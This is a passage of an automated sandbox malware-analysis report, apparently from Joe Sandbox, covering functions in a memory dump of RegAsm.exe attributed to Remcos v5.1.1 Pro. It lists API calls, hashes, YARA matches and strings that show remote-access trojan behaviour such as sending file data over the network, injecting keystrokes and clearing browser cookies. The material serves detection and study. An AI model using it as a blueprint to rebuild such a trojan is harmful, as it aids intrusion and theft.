                                          • Opcode Fuzzy Hash: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                                          • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                          Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                          • MoveFileW.KERNEL32 ref: 00407AA5
                                          • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                          • String ID: .part
                                          • API String ID: 1303771098-3499674018
                                          • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                          • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                          Function 0041CE2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • AllocConsole.KERNEL32 ref: 0041CE35
                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Console$Window$AllocOutputShow
                                          • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                          • API String ID: 4067487056-3820604032
                                          • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                          • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                          • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                          • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                          Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendInput.USER32 ref: 00419A25
                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InputSend$Virtual
                                          • String ID:
                                          • API String ID: 1167301434-0
                                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                          Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16_free
                                          • String ID: a/p$am/pm$h{D
                                          • API String ID: 2936374016-2303565833
                                          • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                          • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                          Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • _free.LIBCMT ref: 00444E87
                                          • _free.LIBCMT ref: 00444E9E
                                          • _free.LIBCMT ref: 00444EBD
                                          • _free.LIBCMT ref: 00444ED8
                                          • _free.LIBCMT ref: 00444EEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID: KED
                                          • API String ID: 3033488037-2133951994
                                          • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                          • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                          Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Enum$InfoQueryValue
                                          • String ID: [regsplt]$xUG$TG
                                          • API String ID: 3554306468-1165877943
                                          • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                          • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                          • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                          • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                          Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleCP.KERNEL32 ref: 0044B47E
                                          • __fassign.LIBCMT ref: 0044B4F9
                                          • __fassign.LIBCMT ref: 0044B514
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                          Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleCP.KERNEL32 ref: 100094D4
                                          • __fassign.LIBCMT ref: 1000954F
                                          • __fassign.LIBCMT ref: 1000956A
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                          Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnumInfoOpenQuerysend
                                          • String ID: xUG$NG$NG$TG
                                          • API String ID: 3114080316-2811732169
                                          • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                          • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                          • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                          • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                          Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                          Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                          • _wcslen.LIBCMT ref: 0041B7F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                          • API String ID: 3286818993-122982132
                                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                          Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                          • API String ID: 1133728706-4073444585
                                          • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                          • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                          • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                          • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                          Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                          • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                          Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreatePointerWrite
                                          • String ID: xpF
                                          • API String ID: 1852769593-354647465
                                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                          Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                          • _free.LIBCMT ref: 00450FC8
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00450FD3
                                          • _free.LIBCMT ref: 00450FDE
                                          • _free.LIBCMT ref: 00451032
                                          • _free.LIBCMT ref: 0045103D
                                          • _free.LIBCMT ref: 00451048
                                          • _free.LIBCMT ref: 00451053
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                          Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                          • _free.LIBCMT ref: 100092AB
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 100092B6
                                          • _free.LIBCMT ref: 100092C1
                                          • _free.LIBCMT ref: 10009315
                                          • _free.LIBCMT ref: 10009320
                                          • _free.LIBCMT ref: 1000932B
                                          • _free.LIBCMT ref: 10009336
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                          Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                          • int.LIBCPMT ref: 004111BE
                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                          • String ID: (mG
                                          • API String ID: 2536120697-4059303827
                                          • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                          • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                          • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                          • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                          Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
